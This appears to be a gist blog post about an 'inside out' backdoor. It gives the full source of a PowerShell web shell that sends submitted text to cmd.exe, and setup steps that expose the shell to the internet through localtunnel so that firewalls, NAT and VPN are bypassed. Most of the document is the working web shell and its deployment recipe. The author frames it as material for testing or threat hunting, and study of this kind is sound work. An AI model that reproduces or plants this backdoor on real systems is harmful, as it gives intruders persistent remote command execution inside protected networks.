Gist Blog - Inside Out, Simple backdoors

blog.txt

From the inside out, a minimalist backdoor. 

I'm a pretty big fan of simple, and elegant.  In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a FireWall, NAT and VPN.

We will use in this example 3 tools.
1. Node
2. PowerShell
3. LocalTunnel

While I have a full compact, custom version, I will not release this.  
This post is just to show you the concepts so you can test or hunt for this type of behavior.
If you want to customize this then do it yourself.  For this example, I'm being intentionally noisy.

The idea is simple.  

A host inside the target network, advertises a simple back door publicly.  For this I will simply use a local web server on port 9999.  You do not need to be admin to listen on high ports.  You could easily leverage this to reroute or tunnel protocols like ssh or rdp. 

Steps.

1. Download this gist to some windows host
2. Extract to some folder.
3. install nodeJS
4. start PowerWebShell.ps1
5.  npm install -g localtunnel
6. lt --port 9999


localtunnel will emit a url that exposes the backdoor, simple browse to that.

example https://stranger-things-12.localtunnel.me/shell

You can then execute commands etc.. to demonstrate the effectiveness of an inside out tunnel.

Thats all

Cheers,

references:
https://localtunnel.github.io/www/
https://nodejs.org/en/

customserver.txt

example, setup linux server
point DNS at it.
install node
install localtunnel-server
`node -r esm ./bin/server`

powerwebshell.txt

<#
  Simple Web Shell over HTTP
#>

$Server = '127.0.0.1' #Listening IP. Change This. Or make it a parameter, I don't care ;-)

function Receive-Request {
   param(      
      $Request
   )
   $output = ""
   $size = $Request.ContentLength64 + 1   
   $buffer = New-Object byte[] $size
   do {
      $count = $Request.InputStream.Read($buffer, 0, $size)
      $output += $Request.ContentEncoding.GetString($buffer, 0, $count)
   } until($count -lt $size)
   $Request.InputStream.Close()
   $cmd = $output.Split("=")
   $OutputVariable = &{ cmd.exe /c $cmd[1].Split("+") | Out-String}
   return $OutputVariable
}

$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add('http://127.0.0.1:9999/') 

$listener.Start()
'Listening ...'
while ($true) {
    $context = $listener.GetContext() # blocks until request is received
    $request = $context.Request
    $response = $context.Response
	$hostip = $request.RemoteEndPoint
	
	if ($request.Url -match '/shellPost$' -and ($request.HttpMethod -eq "POST") ) { 
		
		$message = Receive-Request($request);
		[byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message)
		$response.ContentLength64 = $buffer.length
		$output = $response.OutputStream
		$output.Write($buffer, 0, $buffer.length)
		$output.Close()
		continue
	}
    if ($request.Url -match '/shell$' -and ($request.HttpMethod -eq "GET")) {
		$enc = [system.Text.Encoding]::UTF8
		$response.ContentType = 'text/html'
		$shellcode = '<form action="/shellPost" method="POST" >
					  Command:<br>
					  <input type="text" name="Command" value="ipconfig.exe"><br>
					  <input type="submit" value="Submit">
					</form>'
		
		$buffer = $enc.GetBytes($shellcode)		
		$response.ContentLength64 = $buffer.length
		$output = $response.OutputStream
		$output.Write($buffer, 0, $buffer.length)
		$output.Close()
		continue
	}
    
	$message = '<html><h1>It Works!</h1></html>'
    [byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message)
    $response.ContentLength64 = $buffer.length
    $output = $response.OutputStream
    $output.Write($buffer, 0, $buffer.length)
    $output.Close()
}

$listener.Stop()